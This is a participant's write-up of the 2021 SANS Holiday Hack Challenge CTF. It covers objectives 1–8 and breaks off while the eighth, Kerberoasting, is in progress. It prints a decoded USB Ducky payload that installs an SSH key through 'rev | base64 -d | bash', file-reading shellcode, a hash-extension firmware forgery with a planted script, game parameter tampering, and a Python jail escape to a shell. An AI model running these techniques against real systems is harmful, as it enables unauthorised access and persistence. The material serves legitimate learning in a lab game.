2021 SANS Holiday Hack Report

Objective and Terminal Assessment
Report
Author: Steven Maestas
Tuesday, December 21st
, 2021

SANS HHC: Challenge and Terminal Assessment Report
Table of Contents
1 Summary.............................................................................................................................................................3
1.1 Executive Summary.....................................................................................................................................3
1.2 Assessment Summary..................................................................................................................................3
2 Objectives............................................................................................................................................................3
2.1 Objective 1 – Kringlecon Orientation..........................................................................................................3
2.2 Objective 2 – Where in the World is Caramel Santaigo?.............................................................................4
2.3 Objective 3 – Thaw Frost Tower’s Entrance................................................................................................7
2.4 Objective 4 – Slot Machine Investigation....................................................................................................9
2.5 Objective 5 – Strange USB Device............................................................................................................10
2.6 Objective 6 - Shellcode Primer..................................................................................................................11
2.7 Objective 7 – Printer Exploitation.............................................................................................................16
2.8 Objective 8 – Kerberoasting on an Open Fire............................................................................................18
2.9 Objective 9 – Splunk!................................................................................................................................24
2.10 Objective 10 – Now Hiring!....................................................................................................................26
2.11 Objective 11 – Customer Complaint Analysis..........................................................................................27
2.12 Objective 12 – Frost Tower Website Checkup.........................................................................................28
2.13 Objective 13 – FPGA Programming........................................................................................................30
2.14 End Game................................................................................................................................................31
3 Terminals...........................................................................................................................................................32
3.1 Exif Metadata............................................................................................................................................32
3.2 Grepping for Gold.....................................................................................................................................32
3.3 Logic Munchers.........................................................................................................................................33
3.4 IPv6 Sandbox.............................................................................................................................................34
3.5 Holiday Hero.............................................................................................................................................35
3.6 HoHo...No.................................................................................................................................................36
3.7 Yara Analysis.............................................................................................................................................38
3.8 IMDS Exploration.....................................................................................................................................40
3.9 Strace Ltrace Retrace.................................................................................................................................43
3.10 Elf Code Python.......................................................................................................................................44
3.11 Frost-o-Vator............................................................................................................................................49
4 Appendix A........................................................................................................................................................49
4.1 Bonus! Blue Log4Jack...............................................................................................................................49
4.2 Bonus! Red Log4Jack................................................................................................................................50

1 Summary
1.1 Executive Summary
The SANS Holiday Hack Challenge (HHC) is an annual, virtual security conference (Kringlecon) and CTF developed
by SANS, sponsored by Google and Splunk and made available for free to anyone who has a web browser, Internet
connection, and wants to participate. This year’s HHC became available starting on December 9th
2020. In addition
to offering this conference and CTF free of charge, SANS also allows participants to write a report on the challenges
(objectives and terminals) and submit that report for a chance to win a variety of prizes. This report has been
published as an entrant into that competition. The documentation contained herein relate directly to the solutions to
each challenge hosted and solved in the SANS 2021 HHC.
1.2 Assessment Summary
Documentation below relates directly to each challenge offered in the SANS 2021 HHC. The technical challenges are
split between objectives, which are the main challenges necessary to complete the CTF and the accompanying
narrative, and terminals, smaller challenges which are often meant to develop an initial skill set for the objectives or
allow the participant to earn hints which allow them to better understand the problems to be solved in the main
objectives. This year’s HHC consists of 13 objectives and 14 terminal challenges, adding up to a total of 27
individual technical problems to be solved. This reports details the solution to every objective and terminal challenge.
The documentation below will show how each objective or terminal challenge was solved.
2 Objectives
2.1 Objective 1 – Kringlecon Orientation
Upon registering or logging in with an account registered in previous HHCs, the user is transported into a virtual
world. In this case you begin with an onscreen avatar that you can move with the keyboard arrow keys or mouse.
You can interact with other NPCs in the game. Your avatar also has a badge in the center of the sprite which gives
information such as the currently unlocked narrative, list of objectives, hints, items, achievement, etc. Upon exploring
this badge after talking with the first NPC we encounter, we find our first objective. This years Kringlecon includes
an orientation challenge that walks you through user interface.
No hints are given for this objective
The following steps are required to complete this initial objective:
• 1a – Talk to Jingle Ringford
• 1b – Get your badge
• 1c – Get the wifi adapter
• 1d – Use the terminal
Objectives 1a and 1b will be completed as you talk to Jingle Ringford and he explains the Kringlecon and the
functionality of the badge. As you continue to click on Jingle a image of a wifi adapter will appear and you will have
to pick it up to complete Objective 1c.

After clicking the wifi adapter, you will move over and pick it up and Objective 1c will be marked as complete.
Jingle will also prompt you to talk to him again. When you click on him, a terminal will appear.
Click on the terminal and type answer in the top window of the terminal. Terminal challenges can be solved by
automatically completing the terminal challenge and having the code automatically register your completion or by
typing the correct keyword or phrase into the input window, as seen here.
Upon completing this terminal the gate to the rest of the CTF/Kringlecon will automatically open. In addition to
showing the objective as solved in the badge, we are also awarded our first two achievements, Kringlecon Tutorial and
Open the Gate.
2.2 Objective 2 – Where in the World is Caramel Santaigo?
The second objective is an OSINT challenge, where you must use bits of information provided to find out the final
destination of a random elf and who that elf is based on their personal characteristics and a builtin search engine that
allows you filter a list of elves based on the characteristics you learn.
You can also gain additional hints by speaking with Piney Sappington in the courtyard. Hints are given after you
solve the Exif Metadata terminal located right beside Piney Sappington.
All hints are listed below:
Enter the answer here
> answer
Welcome to the first terminal challenge!
This one is intentionally simple. All we need you to do is:
Click in the upper pane of this terminal
Type answer and press enter
elf@d242a1e59d58:~$

• Coordinate Systems – Don’t forget coordinate systems other than lat/long like MGRS and what3words.
• Flask Cookies – While Flask cookies can’t generally be forged without the secret, they can often be decoded
and read.
• OSINT – Clay Moody is giving a talk about OSINT techniques right now!
Clicking on the terminal starts the OSINT challenge and presents us with the following instructions.
As this investigation will be random and there is potentially a lot of information to process, clue, tool used to
investigate, and resulting evidence will be provided in the order it is given for each location in order.
Start: Santa’s Castle
Investigate1: I’ve heard that when British children put letters to Father Christmas in the fireplace, they magically end
up there!
Tool: Google
Evidence: https://santaclausvillage.info/santa-claus/santa-claus-main-post-office/ - -Santa's Office is in Rovaniemi,
Finland, according to a Google search.
Investigate2: They just contacted us from an address in the 80.95.128.0/20 range.
Tool: Maxmind GeoIP Database
Evidence: IP addresses in the 80.95.128.0/20 range are located in Finland according to MaxMind’s GeoIP database.
Investigate3: They were dressed for -5.0 C and light snow conditions. The elf mentioned something about Stack
Overflow and Golang.
Interlink: Language Spoken: GoLang
Results: No results based on single attribute
Location 1 – Rovaniemi, Finland.
Investigate1: They said they wanted to visit Christmas markets – like Christkindlmarkt and Spittelberg, enjoy fried
sausages and goulash soup, and drink hot Christmas punch.
Tool: Google
Evidence: A search for Christkindlmarkt and Spittelberg brings up results for markets held in Vienna, Austria.
https://www.visitingvienna.com/sights/christmasmarkets/spittelberg/
Investigate 2: They just contacted us from an address in the the 137.208.0.0/16 range.
Tool: Maxmind GeoIP Database
Evidence: IP addresses in the 137.208.0.0/16 range are located in Vienna, Austria according to MaxMind’s GeoIP
database.
Welcome! In this game you will analyze clues and
track an elf around the world. Put clues about your
elf in your InterRick portal. Depart by sleigh once
you’ve figured out your next stop. Be sure to get
there by Sunday, gumshoe. Good luck!
Start Game!

Investigate 3: They were dressed for 2.0 C and fog conditions. The elf got really heated about using spaces for
indents.
Tool: Interlink: Language Spoken: GoLang, Preferred indents: Spaces
Results: Jingle Ringford, Noel Boetie
Location 2 – Vienna, Austria
Investigate1: I’m not sure what a hogmanay is, but that elf wants to experience one just after Christmas.
Tool: Google
Evidence: https://www.bbc.co.uk/newsround/38477036. Hogmanay is the Scottish name for New Year celebrations.
Investigate2: They sent me this blurry selfie of themselves or someone they met:
Tool: Jimpl.com
Evidence: 142 m Above Sea Level, Lat: 55 deg 46’ 54.85” N Long: 3 deg 11’ 59.71” E somewhere on the North Sea
between Denmark and England/United Kingdom and on the same latitude as Edinburgh, Scotland.
Investigate 3: They were dressed for 10.0C and clear conditions. They kept checking their Discord app.
Tool: Interlink: Language Spoken: GoLang, Preferred indents: Spaces, Preferred social medium: Discord
Results: Noel Boetie
Location 3 – Edinburgh, Scotland.
Investigate 1: You just missed the elf!
Investigate 2: You’ve caught up to the elf in time! Do you know who you’ve caught? Elf: Noel Boetie

After correctly traveling to all locations via sleigh upon correct analysis of the evidence you must select the correct elf
based on their characteristics. In this game it was Noel Boetie. Upon selecting the correct elf, you receive the Where
in the World is Caramel Santiago? achievement.
2.3 Objective 3 – Thaw Frost Tower’s Entrance
The third objective is found in front of Frost Tower. The goal of this objective is to gain access to a thermostat via
WIFI and use the command line to adjust the temperature and thaw the front door. Greasy GopherGuts in front of
Frost Tower gives you three hints without having to solve a terminal challenge.
The following information and hints regarding this objective are given:
• Linux Wi-Fi Commands – The iwlist and iwconfig utilities are key for managing Wi-Fi from the Linux
command line
• Web Browsing with cURL - cURL makes HTTP requests from a terminal – in Mac, Linux, and modern
Windows!
• Adding Data to cURL requests – When sending a POST request with data, add –data-binary to your curl
command followed by the data you want to send.
The thermostat can be seen through the window next to the door. Getting as close as possible to the thermostat,
opening the Wi-Fi adapter interface, and running the following command shows us an open wireless network.
We can connect to the wireless network using the following command. We also see that, upon connecting, we are
given the URL to the setup for the thermostat.
elf@d21a3aa6f958:~$ iwlist scanning
Wlan 0 scan complated:
Cell 01 – Address: 02:4a:46:68:69:21
Frequency: 6.2 GHz (Channel 40)
Quality=48/70 Signal level=-62 dBm
Encryption key:off
Bit Rates: 400 Mb/s
ESSID:”FROST-Nidus-Setup”

Running curl on http://nidus-setup:8080 gives us the following:
Running curl on http://nidus-setup:8080/apidoc gives us the following manpage type instructions on using the
thermostat API.
Now we can set the temperature higher to melt the door using the following command.
elf@d21a3aa6f958:~$ iwconfig wlan0 essid “FROST-Nidus-Setup”
** New network connection to Nidus Thermostat detected! Visit http://nidus-setup:8080/ to complete
setup.
(The setup is comptaible with the ‘curl’ utility)
elf@d21a3aa6f958:~$ curl http://nidus-setup:8080
----------------------------------------------------------------------------
Nidus Thermostat Setup
----------------------------------------------------------------------------
WARNING Your Nidus Thermostat is not currently configured! Access to this
Device is restricted until you register your thermostat >> /register. Once you have completed
registration, the device will be fully activated.
In the meantime, Due to North Pole Health and Safety regulations
42 N.P.H.S 2600(h)(0) – frostbite proection, you may adjust the temperate.
API
The API for your Nidus Thermostat is located at http://nidus-setup:8080/apidoc
elf@d21a3aa6f958:~$ curl http://nidus-setup:8080
----------------------------------------------------------------------------
Nidus Thermostat API
----------------------------------------------------------------------------
The API endpoints are accessed via:
http://nidus-setup:8080/api/<endpoint>
Utilize a GET request to query information; for example, you can check the temperatures set on your
cooler with:
curl -XGET http://nidus-setup:8080/api/cooler
Utilize a POST request with a JSON payload to configuration information; for example, you can change the
temperature on your cooler using:
curl -XPOST H ‘Content-Type: application/json’
--data-binary ‘{“temperature”: -40}’
http://nidus-setup:8080/api/cooler
- Warning: DO NOT SET THE TEPERATURE ABOVE 0! That might melt important furniture
Available endpoints
------------------------------------------------------------
| Path | Available with registering?|
------------------------------------------------------------
| /api/cooler | Yes |
------------------------------------------------------------
| /api/host-ice-tank | No |
------------------------------------------------------------
...

After running the previous command the doors will be thawed and we will now be able to access Frost Tower.
We will also get the achievement Thaw Frost Tower’s Entrance.
2.4 Objective 4 – Slot Machine Investigation
In this objective, we must play a slot machine game, but manipulate the game to get a total of over 1,000 coins. Noel
Boetie in front of Santa’s Castle will give us two hints after solving the Logic Munchers terminal challenge.
The following information and hints regarding this objective are given:
• Parameter Tampering – It seems they’re susceptible to parameter tampering.
• Intercepting Proxies – Web application testers can use tools like Burp Suite or even right in the browser
with Firefox’s Edit and Resend feature.
When inspecting the web traffic between slots.jackfrosttower.com and your browser, you find the following POST
data is sent.
We find when tampering with these parameters that we can make the numline parameter negative and the math on the
server side will be done such that we are awarded a positive amount when we actually lose the spin. Using Burp
repeater, we can keep sending requests with a negative numline in quick succession to keep winning until we get a
JSON response with the following values:
betamount=[num]&numline=[num]&cpl=[num]
{
"success": true,
"data": {
"credit": 1038,
...
},
"response": "I'm going to have some bouncer trolls bounce you right out of this casino!"
},
"message": "Spin success"
}
elf@d21a3aa6f958:~$ curl -XPOST -H ‘Content-Type: application/json’ –data-binary ‘{“temperature”: 100}’
http://nidus-setup:8080/api/cooler
{
”temperature”: 100.45,
”humidity”: 68.89,
”wind”: 5.3,
”windchill”: 112.72,
”WARNING”: “ICE METL DETECT!”
}
elf#d21a3aa6f958:~$

Entering the text in the response attribute “I’m going to have some bouncer trolls bounce you right out of this casino!”
into the the challenge textbox on your badge will solve the challenge and give you the Slot Machine Scrutiny
achievement.
2.5 Objective 5 – Strange USB Device
The goal of this objective is to reverse engineer a ducky script found on a USB device to figure out what keyboard
commands are being sent to a computer in which this device is attached.
The following hints are given for this objective:
• Ducky Script – Ducky Script in the language for the USB Rubber Ducky
• Duck Encoder – Attackers can encode Ducky Script using a duck encoder for delivery as inject.bin.
• MITRE ATT&CK and Ducky – The MITRE ATT&CK tactic T1098.004 describes SSH persistence
techniques through authorized keys files.
• Ducky RE with Mallard – It’s also possible to reverse engineer encoded Ducky Script using Mallard.
We are given the location of a USB device at /mnt/USBDEVICE. On this usb device we find an encoded ducky script
named inject.bin. With the hint, we can decode the ducky script using the provided mallard.py Python tool.
Let’s decode this script and look for anything suspicious.
If we just run the following command, we will reverse then Base64 the encoded command in the ducky script.
A random USB device, oh what could be the matter?
It seems a troll has left this, right on a silver platter.
Oh my friend I need your ken, this does not smell of attar.
Help solve this challenge quick quick, I shall offer no more natter.
Evaluate the USB data in the /mnt/USBDEVICE.
elf@36ac099f3f10:~$ ls /mnt/USBDEVICE
inject.bin
elf@36ac099f3f10:~$ ./mallard.py -f /mnt/USBDEVICE/inject.bin
...
ENTER
DELAY 200
STRING echo ==gCzlXZr9FZlpXay9Ga0VXYvg2cz5yL+BiP+AyJt92... | rev | base64 -d | bash
ENTER
DELAY 600
...
elf@36ac099f3f10:~$ echo
==gCzlXZr9FZlpXay9Ga0VXYvg2cz5yL+BiP+AyJt92YuIXZ39Gd0N3byZ2ajFmau4WdmxGbvJHdAB3bvd2Ytl3ajlGILFESV1mWVN2SC
hVYTp1VhNlRyQ1UkdFZopkbS1EbHpFSwdlVRJlRVNFdwM2SGVEZnRTaihmVXJ2ZRhVWvJFSJBTOtJ2ZV12YuVlMkd2dTVGb0dUSJ5UMVd
GNXl1ZrhkYzZ0ValnQDRmd1cUS6x2RJpHbHFWVClHZOpVVTpnWwQFdSdEVIJlRS9GZyoVcKJTVzwWMkBDcWFGdW1GZvJFSTJHZIdlWKhk
U14UbVBSYzJXLoN3cnAyboNWZ | rev | base64 -d | bash
echo 'ssh-rsa
UmN5RHJZWHdrSHRodmVtaVp0d1l3U2JqZ2doRFRHTGRtT0ZzSUZNdyBUaGlzIGlzIG5vdCByZWFsbHkgYW4gU1NIIGtleSwgd2UncmUgb
m90IHRoYXQgbWVhbi4gdEFKc0tSUFRQVWpHZGlMRnJhdWdST2FSaWZSaXBKcUZmUHAK
ickymcgoop@trollfun.jackfrosttower.com' >> ~/.ssh/authorized_keys

We can see that the username associated with the SSH key installed onto this system is ickymcgoop. We can type this
into the answer window to solve.
Entering the correct answer solves the objective and gives us the achievement Strange USB Device.
2.6 Objective 6 - Shellcode Primer
This sixth objective is a web-based application that walks you through the process of creating assembly language ,
which is an important part of creating and understanding shellcode (hex formatted machine language often used in
exploit programs and scripts). Hint’s will be given by Chimney Scissorsticks upon completing Santa’s Holiday Hero
(terminal) challenge.
The following hints are given for this challenge:
• Shellcode Primer Primer – If you run into any shellcode primers at the North Pole, be sure to read the
directions and the comments in the shellcode source!
• Debugging Shellcode – Also, troubleshooting shellcode can be difficult. Use the debugger step-by-setp
feature to watch values.
• Register Stomping – Lastly, be careful not to overwrite any register values you need to reference later on in
your shellcode.
To solve this challenge, you need to solve each individual piece by inputting the correct assembly to do the task. Each
of the tasks will be covered below.
1. Introduction - Welcome to Shellcode Primer! The goal of Shellcode Primer is to teach you how to write some
basic x64 shellcode for reading a file. We'll take you through each piece of what you need, step by step, and show you
what's going on. First, let's learn the user interface a bit. There's some code below. The left is where you type code,
and the right will attempt to syntax-highlight and show build errors.
For the time being, you don't need to change anything, just have a look at what it's doing - it's more or less the same
type of stuff you're going to be learning. Go ahead and execute the code (using the bottom below) and play around in
the debugger. On the left, you'll see instructions executing in the order that they execute. Click on them to the state
when that instruction executes! Also, don't forget to click that hint button below! Hints don't cost you anything. :)
2. Loops - Although you won't have to worry about writing a loop for any of these lessons, showing how a loop works
is a good demo for the debugger. Look at the code below, then execute it (no need to change it). Watch how the same
code repeats, over and over, with rax changing in each loop. Notice how the code listing below isn't the same as what
What is the troll username involved with this attack?
> ickymcgoop
Your answer:
Checking…
Your answer is correct! Drat that Icky Mcgoop!
No instructions necessary as the default code already solves this step.

is executed in the debugger. In the History section of the debugger, the instructions will change to show what is
executed to achieve what you describe in the assembly source code.
3. Getting started – Welcome! Are you read to learn how to write shellcode? We hope so First, some tips:
• Comments are denoted with a semicolon (;)
• Don’t forget to look at the debugger, line by line, if something is wrong
• Really, don’t forget to read the error list! We check each place where you might go wrong in your code
• Your code for each level is saved in your browser, so you can leave and come back, refresh the page, and hop
back to previous levels to borrow code
This level currently fails to build because it has no code. Can you add a return statement at the end? Don’t worry
about what it’s actually returning (yet!)
4. Returning a Value – Now that we have an empty function, we can start building some code! Let’s learn what a
register is. A register is like a variable, except there are a small number of them – you have about eight general
purpose 64-bit integers registers on amd64 (we won’t talk about floating point or other special registers):
• rax
• rbx
• …
All mathy stuff that a computer does (add, subtract, xor, etc) operates on registers, not directly on memory. So they’re
super important! Specific registers have some implicit meaning, mostly by convention. For example, when a function
returns, its return value is typically put in rax. For this level, can you return the number ‘1337’ from your function?
5. System Calls – If you’ve made it this far, I bet you’re wondering how to make your shellcode do something! If
you’re familiar with Python, you might know how to use the open() function. If you know C, you might know the
fopen() function. But what these and similar functions have in common is one things: they’re library code. And
because shellcode needs to be self contained, we don’t have (easy) access to library code! So how do we deal with
that? Linux has something called a syscall, or system call. A syscall is a request that program makes that asks Linux
– the kernel – to do something. And it turns out, at the end of the day, all of the library calls ultimately end with a
syscall. Here is a list of available syscalls on x64 (alternative). To perform a syscal:
• The number for the desired syscall is moved into rax
• The first parameter is moved into rdi, the second into rsi, and the tird into rdx (there are others, but not many
syscalls need more than 3 parameters)
• Execute the syscall instructions
The second syscall executes, Linux flips into kernel mode and we can no longer debug it. When it’s finished, it
returns the result in rax.
For this challenge we’re going to call sys_exit to exit the process with exit code 99. Can you prepare rax and rdi with
the correct values to exit? As always, feel free to mess around as much as you like!
; This is a comment! We'll use comments to help guide your journey.
; Right now, we just need to RETurn!
;
; Enter a return statement below and hit Execute to see what happens!
ret
; TODO: Set rax to 1337
mov rax, 1337
; Return, just like we did last time
ret

6. Calling Into the Void – Before we learn how to use Really Good syscalls, let’s try something fun: crash our
shellcode on purpose! You might think I’m mad, but there’s a method to my madness. Run the code below and watch
watch happens! No need to modify it, unless you want to. :) Be sure to look at the debugger to see what’s going on!
Especially notice the top of the stack at the ret instruction.
7. Getting RIP – What happened in the last exercise? Why did it crash at 0x12345678? And did you notice the
0x12345678 was on top of the stack when ret happened? The short story is this: call pushes the return address onto
the stack, and ret jumps to it. Whaaat?? This is going to be long, but hopefully it will make it all clear! Let’s backup a
bit. At any given point, the instruction currently being executed is stored in a special register called the instruction
pointer (rip), which you may also hear called a program counter (pc). What is the rip value at the first line in our
code? Well, since we have a debugger, we know that it’s 0x1337000. But sometimes you don’t know and need to
find out. The most obvious answer is to treat it like a normal register, like this:
mov rax, rip
ret
Doest that work? Nope! You can’t directly access rip. That means we need a trick! When you use call in x64, the
CPU doesn’t care where it’s calling, or whether there’s a ret waiting for it. The CPU assumes that, if the author put a
call in, there will naturally be a ret on the other end. Doing anything else would be just silly! So call pushes the
return address onto the stack before jumping into a function. When the function completes, the ret instruction uses the
return address on the stack to know where to return to. The CPU assumes that, sometime later, a ret will execute. The
ret assumes that at some point earlier a call happened, and that means that the top of the stack has the return address.
The ret will retrieve the return addresses off the top of the stack (using pop) and jump to it. Of course, we can execute
pop too! If we pop the return address off the stack, instead of jumping to it, the address goes into a register. Hmm.
Does that also sound like mov REG,ip to you? For this exercise, can you pop the address after the call – the No Op
(nop) instruction – into the rax then return?
8. Hello, World! - So remember how last level, we got the address of nop and returned it? Did you see that nop
execute? Nope! We jumped right over it, but stored its address en-route. What can we do by knowing our own
address? Well, since shellcode is, by definition, self-contained, you can do other fun stuff like include data alongside
the code! What if the return address isn’t an instruction at all, but a string? For this next exercise, we include a
plaintext string – ‘Hello World!’ - as part of the code. It’s just sitting there in memory. If you look at the compiled
code, it’s all basically Hello World, which doesn’t run. Instead of trying to run it, can you call past it, and pop its
address into rax? Don’t forget to check the debugger after to see it in rax!
; TODO: Find the syscall number for sys_exit and put it in rax
mov rax, 60
; TODO: Put the exit_code we want (99) in rdi
mov rdi, 99
; Perform the actual syscall
syscall
; Remember, this call pushes the return address to the stack
call place_below_the_nop
; This is where the function *thinks* it is supposed to return
nop
; This is a 'label' - as far as the call knows, this is the start of a function
place_below_the_nop:
; TODO: Pop the top of the stack into rax
pop rax
; Return from our code, as in previous levels
ret

9. Hello World!! - Remember syscalls? Earlier, we used them to call an exit. Now let’s try another! This time,
instead of getting a pointer to the string Hello World, we’re going to print it to standard output (stdout). Have another
look at the syscall table. Can you find sys_write, and use it to print the string Hello World! To stdout? Note: stdout’s
file descriptor is 1.
10. Opening a File – We’re getting dangerously close to doing something interesting! How about that? Can you use
the sys_open syscall to open /etc/password, then return the file handle (in rax)? Have another look at the syscall table.
Can you call sys_open on the file /etc/password, the return the file handle? Here’s the syscall table again.
; This would be a good place for a call
call lblhello
; This is the literal string 'Hello World', null terminated, as code. Except
; it'll crash if it actually tries to run, so we'd better jump over it!
db 'Hello World',0
; This would be a good place for a label and a pop
lblhello:
pop rax
; This would be a good place for a re... oh wait, it's already here. Hooray!
ret
; TODO: Get a reference to this string into the correct register
call below_string
db 'Hello World!',0
below_string:
; Set up a call to sys_write
; TODO: Set rax to the correct syscall number for sys_write
mov rax, 1
; TODO: Set rdi to the first argument (the file descriptor, 1)
mov rdi, 1
; TODO: Set rsi to the second argument (buf - this is the "Hello World" string)
pop rsi
; TODO: Set rdx to the third argument (length of the string, in bytes)
mov rdx,12
; Perform the syscall
syscall
; Return cleanly
mov rax,0
ret

11. Reading a File – Do you feel ready to write some useful code? We hope so! You’re mostly on your own this
time! Don’t forget that you can reference your solutions from other levels! For this exercise, we’re going to read a
specific file...let’s say, /var/nothpolesecrets.txt...and write it to stdout. No reason for the name, but since this is Jack
Frost’s troll-trainer, it might be related toa top-secret missions! Solving this is going to require three syscalls! Four if
you decide to use sys_exit – you’re welcome to return or exit, just don’t forget to fix the stack if you return! First up,
just like last exercise, call sys_open. This time, be sure to open /var/northpolesecrets.txt. Second, find the sys_read
entry on the syscall table, and set up the call. Some tips:
1. The file descriptor is returned by sys_open
2. The buffer for reading the file can be any writeable memory – rsp is a great option, temporary storage is what the
stack is meant for
3. You can experiment to find the right count, but if it’s a bit too high, that’s perfectly fine
Third
1. The file descriptor for stdout is always 1
2. The best value for count in the return value from sys_read, but you can experiment with that as well (if it’s too long,
you might get some garbage after; that’s okay!)
Finally, if you use rsp as a buffer,you won’t be able to ret, you’re going to overwrite the return address and ret will
crash. That’s okay! You remember how to sys_exit, right?:) (For an extra challenge, you can also subtract from rsp,
use it, then add to rsp to protect the return address. That’s how typically applications do
it.) Good luck!
; TODO: Get a reference to this string into the correct register
call after_string
db '/etc/passwd',0
after_string:
; Set up a call to sys_open
; TODO: Set rax to the correct syscall number
mov rax,2
; TODO: Set rdi to the first argument (the filename)
pop rdi
; TODO: Set rsi to the second argument (flags - 0 is fine)
mov rsi,0
; TODO: Set rdx to the third argument (mode - 0 is also fine)
mov rdx,0
; Perform the syscall
syscall
; syscall sets rax to the file handle, so to return the file handle we don't
; need to do anything else!
ret

If you complete the final level successfully, you are given the answer that needs to be entered into the badge for this
objective. The output from northpolesecrets.txt is shown below:
Entering the answer of cyber security knowledge, into the badge completes the objective and earns you the Shellcode
Primer! achievement.
2.7 Objective 7 – Printer Exploitation
Objective 6 is meant to be a walk through of using Splunk to do an investigation on the logs and traffic generated by
the Atomic Red Team tests.
; TODO: Get a reference to this
call after_string
db '/var/northpolesecrets.txt',0
after_string:
; TODO: Call sys_open
mov rax,2
pop rdi
mov rsi,0
mov rdx,0
syscall
; TODO: Call sys_read on the file handle and read it into rsp
mov rdi,rax
mov rax,0
sub rsp,200
mov rsi,rsp
mov rdx,200
syscall
; TODO: Call sys_write to write the contents from rsp to stdout (1)
mov rax,1
mov rdi,1
mov rsi,rsp
add rsp,200
mov rdx,200
syscall
; TODO: Call sys_exit
mov rax,0
ret

The following hints are given for this challenge by Ruby Cyster after completing the previous objective:
• Printer Firmware – When analyzing a device, it’s always a good idea to pick apart the firmware.
Sometimes these things come down to Base64-encoding.
• Hash Extension Attacks – Hash Extension Attacks can be super handy when there’s some type of validation
to be circumvented.
• Dropping Files – Files placed in /app/lib/public/incoming will be accessible under
https://printer.kringlecastle.com/incoming.
• Untitled Hint – Do you know that if you append multiple files of that type, the last one is processed?
So we will probably need to complete a hash extension attack on the firmware and append a file that gives us a remote
shell or copies the file of interest into a directory where we have access. We also find, upon accessing the printer
interface that we can download the existing firmware in a json file as seen below:
We find some important information here that we should record as it could be important later. First we have a base64
encoded something that we can decode. More on that later. We also have information on the validation methods used
for this file:
• Signature hash: 2bab052bf894ea1a255886fde202f451476faba7b941439df629fdeb1ff0dc97
• Secret Length: 16
• Algorithm: SHA256
We also find upon decoding the base64 that we have a zip file which contains a firmware.bin binary.
It looks like we have everything we need to do a hash extension attack given the hints. Let’s add an exploit shell
script and zip, then complete the hash extender attack with the provided hash_extender tools on Github. We can clone
the repo with git clone https://github.com/iagox86/hash_extender, the build it by changing into the directory and
running make (on Linux of course). We add custom firmware.bin to the a new zip file that includes the original
firmware as a script that copies /var/spool/printer.log to /app/lib/public/incoming/xploit.log.
Now we run the following command
{
"firmware": "UesDBBQAAAAIAEWlkFMWoKjwagkAAOBAAAAMABwAZmlybXdh...",
"signature": "2bab052bf894ea1a255886fde202f451476faba7b941439df629fdeb1ff0dc97",
"secret_length": 16,
"algorithm": "SHA256"
}
[linuxace@objective7]$ cat firmware-export.json | jq ‘.firmware’ | tr -d ‘”’ | base64 -d > firmware.zip
[linuxace@objective7]$ file firmware.zip
Firmware.zip: Zip archive data, at least v2.0 to extract
[linuxace@objective7]$ unzip firmware.zip
Archive: firmware.zip
inflating: firmware.bin
[linuxace@objective7]$ mv firmware.bin xploit.bin
[linuxace@objective7]$ printf '#!/bin/shncp /var/spool/printer.log /app/lib/public/incoming/xploit.log
n' > firmware.bin
[linuxace@objective7]$ zip x.zip firmware.bin xploit.bin

We can take the hex output of this command and use CyberChef to base64 encode the hex, then take the base64
encoded zip containing our payload and the new signature to modify the firmware-export.json file and then upload.
We should have a valid signature and the last file processed should be run and will copy the printer spool file to a file
we can access via the web interface.
After uploading the file with the correct signature we get the following result.
Now we can obtain the file we need by using curl:
We see that the last .xlsx file printed is Troll_Pay_Chart.xlsx. We can enter this into the objective on our badge to
solve the objective and earn the Hash extension of ELF or firmware achievement.
2.8 Objective 8 – Kerberoasting on an Open Fire
This is one of two challenges in this year’s event that is listed as five trees. We must use a number of techniques,
including Kerberoasting, to obtain a document that has a secret ingredient Santa urges each elf and reindeer to
consider. We have to find this ingredient and enter it on the badge for this challenge. We can receive hints for
this objective by talking to Eve Showshoes and solving the HoHo...No terminal.
[linuxace@objective7]$ ./hash_extender -file=firmware.zip --append=`xxd -p xploit.zip | tr -d 'n'` --
append-format=hex --signature=2bab052bf894ea1a255886fde202f451476faba7b941439df629fdeb1ff0dc97 --
format=sha256 --out-data-format=hex
Type: sha256
Secret length: 16
New signature: e88de8d46972f4208717086e99d27c9aaed64f39f3726ba2ca5f149a0c152b61
New string: 504b030414000000080045a5905316a0a8f06a090000e04000000c001c006669726d776...
{
"firmware": "UesDBBQAAAAIAEWlkFMWoKjwagkAAOBAAAAMABwAZmlybXdh...",
"signature": "dce5658ae7a012cada67080dd9098e6f246a3f4821179fc63169bd49b226ee38",
"secret_length": 16,
"algorithm": "SHA256"
}
linuxace@objective7]$ curl https://printer.kringlecastle.com/incoming/xploit.log
Documents queued for printing
=============================
Biggering.pdf
Size Chart from https://clothing.north.pole/shop/items/TheBigMansCoat.pdf
LowEarthOrbitFreqUsage.txt
Best Winter Songs Ever List.doc
Win People and Influence Friends.pdf
Q4 Game Floor Earnings.xlsx
Fwd: Fwd: [EXTERNAL] Re: Fwd: [EXTERNAL] LOLLLL!!!.eml
Troll_Pay_Chart.xlsx

The following hints are given by Eve Showshoes for this objective:
• Kerberoast and AD Abuse Talk – Check out Chris Davis’ talk and scripts on Kerberoasting and Active
Directory permissions abuse.
• Kerberoasting and Hashcat Syntax – Learn about Kerberoasting to leverage domain credentials to get
usernames and crackable hashes for service accounts.
• Finding Domain Controllers – There will be some 10.X.X.X networks in your routing tables that may be
interesting. Also, consider adding -PS22,445 to your nmap scans to “fix” default probing for unprivileged
scans.
• Hashcat Mangling Rules – OneRuleToRuleThemAll.rule is great for mangling when a password discionary
isn’t enough.
• CeWL for Wordlist Creation – CeWL can generate some great wordlists from websites, but it will ignore
digits in terms by default.
• Stored Credentials – Administrators often store credentials in scripts. These can be coopted by an attacker
for other purposes!
• Active Directory Interrogation – Investigating Active Directory errors is harder without Bloodhound, but
there are native methods.
The first thing we must do is to sign up for an Elf University account at https://register.elfu.org/register. This will
create a unprivileged domain user where we can log in using SSH. A real email address must be used to get our
credentials for authentication.

We then find ourselves in an application jail. After some trial and error, we are able to break out of the Python
application and obtain a shell by pressing CTRL+D and then using the os library to run bash as seen below.
Let’s begin exploring with the tools on the system, including nmap. Running route we see the following networks:
We can do some scans to find the domain controller and any file shares as we will need this for the next step.
===================================================
= Elf University Student Grades Portal =
= (Reverts Everyday 12am EST) =
===================================================
1. Print Current Courses/Grades.
e. Exit
: Traceback (most recent call last):
File "/opt/grading_system", line 41, in <module>
main()
File "/opt/grading_system", line 26, in main
a = input(": ").lower().strip()
EOFError
>>> import os
>>> os.system("/bin/bash")
foszlyqkmw@grades:~$
oszlyqkmw@grades:~$ route
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
default 172.17.0.1 0.0.0.0 UG 0 0 0 eth0
10.128.1.0 172.17.0.1 255.255.255.0 UG 0 0 0 eth0
